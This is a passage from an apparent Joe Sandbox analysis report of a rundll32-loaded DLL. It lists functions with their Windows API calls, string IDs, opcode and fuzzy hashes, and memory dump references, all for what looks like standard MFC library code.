                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1315500227-0
                                                                                                                                  • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                  • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                                  • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                  • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset
                                                                                                                                  • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                  • API String ID: 2102423945-4122032997
                                                                                                                                  • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                  • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                                  • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                  • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                  • String ID: System
                                                                                                                                  • API String ID: 1529587224-3470857405
                                                                                                                                  • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                                  • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                                  • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                                  • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                                  • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                                  • API String ID: 2418878492-2500072749
                                                                                                                                  • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                                  • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                                  • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                                  • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                                  • _memset.LIBCMT ref: 1001579D
                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                                  • LoadBitmapA.USER32 ref: 10015807
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4271682439-3916222277
                                                                                                                                  • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                  • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                                  • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                  • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                                  • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                                  • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2429671754-3916222277
                                                                                                                                  • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                  • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                                  • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                  • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$Metrics$InfoParameters
                                                                                                                                  • String ID: B$DISPLAY
                                                                                                                                  • API String ID: 3136151823-3316187204
                                                                                                                                  • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                  • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                                  • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                  • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Edit
                                                                                                                                  • API String ID: 0-554135844
                                                                                                                                  • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                  • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                                  • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                  • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                                  • SendMessageA.USER32 ref: 10023CD9
                                                                                                                                  • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                                  • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                                  • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187318432-0
                                                                                                                                  • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                  • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                                  • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                  • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                                    • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 69039007-0
                                                                                                                                  • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                  • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                                  • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                  • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                                    • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                                    • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Mode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 696222070-0
                                                                                                                                  • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                  • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                                  • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                  • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                                    • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                                    • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Mode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 696222070-0
                                                                                                                                  • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                  • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                                  • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                  • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                                  • _memset.LIBCMT ref: 10020424
                                                                                                                                  • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                                  • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 289641511-0
                                                                                                                                  • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                  • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                                  • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                  • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                                    • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                                    • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                                    • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                                    • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                                  • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                                    • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                                  • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                                  • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
